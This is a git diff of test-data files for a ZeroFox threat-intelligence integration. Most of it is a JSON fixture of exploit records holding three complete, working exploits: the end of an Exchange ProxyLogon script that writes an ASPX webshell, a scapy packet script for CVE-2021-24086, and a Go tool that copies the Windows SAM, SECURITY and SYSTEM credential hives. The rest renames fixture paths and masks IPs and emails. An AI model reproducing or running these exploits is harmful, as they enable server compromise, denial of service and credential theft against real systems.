'User-Agent': 'ExchangeServicesClient/0.0.0.0', \n 'Content-Type': 'text/xml'\n }\n resp = exploit('/autodiscover/autodiscover.xml', qs='', data=payload, headers=headers)\n res = re.search('(.*?)', resp.text)\n if not res:\n Log.waring(\"LegacyDN not found!\")\n return\n\n headers = {\n 'X-Clientapplication': 'Outlook/15.0.4815.1002', \n 'X-Requestid': 'x', \n 'X-Requesttype': 'Connect', \n 'Content-Type': 'application/mapi-http', \n }\n legacyDN = res.group(1)\n payload = legacyDN + '\\x00\\x00\\x00\\x00\\x00\\x20\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00'\n r = exploit('/mapi/emsmdb/', qs='', data=payload, headers=headers)\n result = re.search('with SID ([S\\-0-9]+) ', r.text)\n if not result:\n Log.waring(f\"Not Found user: {mail}\")\n return None\n sid = result.group(1)\n Log.info(f\"sid:{sid}\")\n if \"500\" not in sid.split(\"-\"):\n Log.waring(\"500 not in sid.\")\n sid = \"-\".join(sid.split(\"-\")[:-1]+[\"500\"])\n Log.info(f\"add -500, sid:{sid}\")\n return sid\n\n \n\n\ndef exp(mail_name, sid):\n payload = f'{sid}'\n resp = exploit('/ecp/proxyLogon.ecp', qs='', data=payload)\n Log.waring(f\"Login status code:{resp.status_code}\")\n\n session_id = resp.cookies.get('ASP.NET_SessionId')\n canary = resp.cookies.get('msExchEcpCanary')\n Log.info(f'get ASP.NET_SessionId = {session_id}')\n Log.info(f\"get msExchEcpCanary = {canary}\")\n \n extra_cookies = [\n 'ASP.NET_SessionId='+session_id, \n 'msExchEcpCanary='+canary\n ]\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n r = exploit('/ecp/DDI/DDIService.svc/GetObject', qs=qs, data='', cookies=extra_cookies)\n identity = r.json()['d']['Output'][0]['Identity']\n Log.info(f\"OAB Name = f{identity['DisplayName']}\")\n Log.info(f\"OAB ID = {identity['RawIdentity']}\")\n\n # Set-OABVirtualDirectory\n Log.info(\"Setting up webshell payload through OAB\")\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'ExternalUrl': 'some_host/' + FILE_DATA\n }\n }\n })\n r = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n assert r.status_code == 200, 'Error while setting up webshell payload'\n Log.success(\"Setting up webshell payload OK!\")\n\n # save file\n Log.info(\"Writing shell...\")\n qs = urlencode({\n 'schema': 'ResetOABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'FilePathName': FILE_PATH\n }\n }\n })\n resp = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n if resp.status_code != 200:\n Log.waring(f\"Error while writing shell, status code is {resp.status_code}\")\n return\n\n\n Log.info(\"Cleaning OAB...\")\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'ExternalUrl': ''\n }\n }\n })\n resp = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n Log.info(f\"resp:{resp.status_code}\")\n Log.success(f\"shell: https://{HOST}/aspnet_client/{SHELL_NAME}.aspx\")\n\n\n\ndef run(runner):\n global HOST, MAILS\n f = open(MAILS)\n try:\n while True:\n mail = next(f)[:-1]\n return runner(mail)\n except:\n Log.waring(\"mails file has been read.\")\n\ndef runner(mail):\n get_local_name()\n sid = get_sid(mail)\n if not sid:\n return\n return exp(mail.split('@')[0], sid)\n\ndef main():\n global HOST, MAILS, MAIL, ARGS\n args = {}\n for v in ARGS:\n args.update(v)\n\n HOST = args.get(\"--host\")\n if not HOST:\n return help()\n \n MAIL=args.get(\"--mail\")\n if MAIL:\n return runner(MAIL)\n\n MAILS=args.get(\"--mails\")\n if MAILS:\n return run(runner)\n\ndef help():\n cout << f\"\"\"usage:\n python {__file__} --host=exchange.com --mail=admin@exchange.com\n python {__file__} --host=exchange.com --mails=./mails.txt\nargs:\n --host: target's address.\n --mail: exists user's mail.\n --mails: mails file.\n \"\"\"\n cout << endl\n\ndef Logo():\n return ''' \n=============================================================\n \n ___ _ \n| . \\ _ _ ___ __ _ _ | | ___ ___ ___ ._ _ \n| _/| '_>/ . \\\\ \/| | || |_ / . \/ . |/ . \\| ' |\n|_| |_| \\___//\\_\\`_. ||___|\\___/\\_. |\\___/|_|_|\n <___' <___' \n\n author: p0wershe11,RGDZ\n=============================================================\n'''\n\n\nif __name__ == \"__main__\":\n cout << Logo()\n main()" + }, + { + "created_at": "2021-07-26T17:22:12Z", + "cve": "CVE-2021-24086", + "urls": [ + "https://github.com/0vercl0k/CVE-2021-24086" + ], + "exploit": "# Axel '0vercl0k' Souchet - April 7 2021\nfrom scapy.all import *\nimport argparse\n\ndef frag6(target, frag_id, bytes, nh, frag_size = 1008):\n '''Ghetto fragmentation.'''\n assert (frag_size % 8) == 0\n leftover = bytes\n offset = 0\n frags = []\n while len(leftover) > 0:\n chunk = leftover[: frag_size]\n leftover = leftover[len(chunk): ]\n last_pkt = len(leftover) == 0\n # 0 -> No more / 1 -> More\n m = 0 if last_pkt else 1\n assert offset < 8191\n pkt = Ether() \\\n / IPv6(dst = target) \\\n / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \\\n / chunk\n\n offset += (len(chunk) // 8)\n frags.append(pkt)\n return frags\n\ndef pull_the_trigger(args):\n '''Trigger CVE-2021-24086 patched in REL2102.'''\n frag_id = random.randint(0, 0xffffffff)\n second_pkt_id = (~frag_id & 0xffffffff)\n reassembled_pkt = IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xa0)),\n ]) \\\n / IPv6ExtHdrFragment(\n id = second_pkt_id, m = 1,\n nh = 17, offset = 0\n ) \\\n / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)\n\n reassembled_pkt = bytes(reassembled_pkt)\n assert (len(reassembled_pkt) % 8) == 0, 'not aligned'\n frags = frag6(args.target, frag_id, reassembled_pkt, 60)\n\n print(f'{len(frags)} fragments, total size {hex(len(reassembled_pkt))}')\n sendp(frags, iface= args.iface)\n\n reassembled_pkt_2 = Ether() \\\n / IPv6(dst = args.target) \\\n / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \\\n / 'doar-e ftw'\n\n sendp(reassembled_pkt_2, iface = args.iface)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--target', default = 'some_ipv6')\n parser.add_argument('--iface', default = 'eth1')\n args = parser.parse_args()\n pull_the_trigger(args)\n return\n\nif __name__ == '__main__':\n main()" + }, + { + "created_at": "2021-07-26T17:24:06Z", + "cve": "CVE-2021-36934", + "urls": [ + "https://github.com/FireFart/hivenightmare", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934" + ], + "exploit": "package main\n\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\t\"time\"\n)\n\nconst (\n\tbase = `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy`\n\ttimeFormat = \"2006-01-02T15_04_05Z07_00\"\n)\n\nfunc processFile(path string) ([]byte, time.Time, error) {\n\tf, err := os.Open(path)\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error opening file: %+v\", err)\n\t}\n\tdefer f.Close()\n\tinfo, err := f.Stat()\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error getting file info: %+v\", err)\n\t}\n\tcontent, err := ioutil.ReadFile(path)\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error reading file content: %+v\", err)\n\t}\n\treturn content, info.ModTime(), nil\n}\n\nfunc checkFile(friendlyname, path string) ([]byte, time.Time, error) {\n\tvar lastmodify time.Time\n\tvar content []byte\n\tfor i := 1; i <= 20; i++ {\n\t\tfullPath := fmt.Sprintf(`%s%d\\%s`, base, i, path)\n\t\tfileContent, fileMod, err := processFile(fullPath)\n\t\tif err != nil {\n\t\t\t// fmt.Println(err)\n\t\t\tcontinue\n\t\t}\n\t\tif fileMod.After(lastmodify) {\n\t\t\tlastmodify = fileMod\n\t\t\tcontent = fileContent\n\t\t}\n\t}\n\tif content == nil || len(content) == 0 {\n\t\treturn nil, time.Now(), fmt.Errorf(\"could not detect a copy of %s in a shadow copy. Maybe the system is already patched or there are no shaow copies\", friendlyname)\n\t}\n\treturn content, lastmodify, nil\n}\n\nfunc main() {\n\tcontent, lastMod, err := checkFile(\"SAM\", `Windows\\System32\\config\\SAM`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_sam_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SAM to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n\n\tcontent, lastMod, err = checkFile(\"SECURITY\", `Windows\\System32\\config\\SECURITY`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_security_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SECURITY to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n\n\tcontent, lastMod, err = checkFile(\"SYSTEM\", `Windows\\System32\\config\\SYSTEM`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_system_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SYSTEM to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n}" + } + ] +} diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/malware.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/malware.json similarity index 86% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/malware.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/malware.json index f7bb3a08a8bf..96caef96d871 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/malware.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/malware.json @@ -6,7 +6,7 @@ "family": null, "md5": "e89b43d57a67a3f4d705028cfbd7b6fb", "sha1": "332c39d5130752b8c32d3b7275a05c13e874db84", - "sha256": "4bc6320085fff7355dd7916a03ef469af0baea9b0a613a1582bdd2a457c6fa40", + "sha256": "****", "sha512": "809e3b6e2eb34a7a061bb8de610baef25f91c0dee5fe1d2e42d04a0ac42e43b40b1ee4e42352cc7d59322aa5cf4b2645c85fed7f36906d68e22e400d48e437ef", "tags": [ "evasion", diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/phishing.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/phishing.json similarity index 90% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/phishing.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/phishing.json index 868c9d752a1a..00f8fa77f1df 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/phishing.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/cti/phishing.json @@ -11,7 +11,7 @@ "issued": "1970-01-19T15:18:43.200000Z" }, "host": { - "ip": "104.26.0.107", + "ip": "some_ip_address", "asn": 13335, "geo": "US" } @@ -19,14 +19,14 @@ { "scanned": "2021-07-12T12:41:38Z", "domain": "hutsjwt.com", - "url": "https://hutsjwt.com/css/mbt", + "url": "some_url/css/mbt", "cert": { "authority": "cPanel, Inc.", "fingerprint": "871B3BD9A98E83573B8368DFDB09629D4E1777BB", "issued": "2021-05-09T00:00:00Z" }, "host": { - "ip": "164.138.221.136", + "ip": "some_ip_address", "asn": 201200, "geo": "BG" } @@ -41,7 +41,7 @@ "issued": "2021-06-23T23:25:26Z" }, "host": { - "ip": "176.236.107.10", + "ip": "some_ip_address", "asn": 34984, "geo": "TR" } diff --git a/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/create_entity.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/create_entity.json new file mode 100644 index 000000000000..aca6770b3b20 --- /dev/null +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/create_entity.json @@ -0,0 +1,3 @@ +{ + "id": "1" +} diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_8_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_8_records.json similarity index 98% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_8_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_8_records.json index 4a127a1678ad..3833e0b8a430 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_8_records.json +++ b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_8_records.json @@ -93,7 +93,7 @@ { "id": 560631, "name": "James Rhodes", - "email_address": "james@stark.com", + "email_address": "some_email_address", "image": "https://cdn.zerofox.com/media/entityimages/d6b7aaa4-a11.jpg", "organization": "", "labels": [ @@ -136,7 +136,7 @@ { "id": 560633, "name": "Natasha Romanoff", - "email_address": "natasha@stark.com", + "email_address": "some_email_address", "image": "https://cdn.zerofox.com/media/entityimages/23b9551f-2bb.png", "organization": "", "labels": [ @@ -179,7 +179,7 @@ { "id": 6969249, "name": "Peter Parker", - "email_address": "pparker@stark.com", + "email_address": "some_email_address", "image": "https://cdn.zerofox.com/media/entityimages/kv7b3f5ubcp9s79zigjegevdri4o274mu05h6d7ufijgsvr3pp8aiwalihnuvbi4.jpg", "organization": "", "labels": [], @@ -220,7 +220,7 @@ { "id": 560636, "name": "Stark Aviation", - "email_address": "bookings@starkair.com", + "email_address": "some_email_address", "image": "https://cdn.zerofox.com/media/entityimages/f5544e89-d2f.jpg", "organization": "", "labels": [ diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_no_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_no_records.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entities_no_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entities_no_records.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entity_types_10_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entity_types_10_records.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entity_types_10_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entity_types_10_records.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entity_types_no_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entity_types_no_records.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/entity_types_no_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/entities/entity_types_no_records.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/policies/policy_types_13_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/policies/policy_types_13_records.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/policies/policy_types_13_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/policies/policy_types_13_records.json diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/policies/policy_types_no_records.json b/Packs/ZeroFox/Integrations/ZeroFox/test_data/policies/policy_types_no_records.json similarity index 100% rename from Packs/ZeroFox/Integrations/ZeroFox/TestData/policies/policy_types_no_records.json rename to Packs/ZeroFox/Integrations/ZeroFox/test_data/policies/policy_types_no_records.json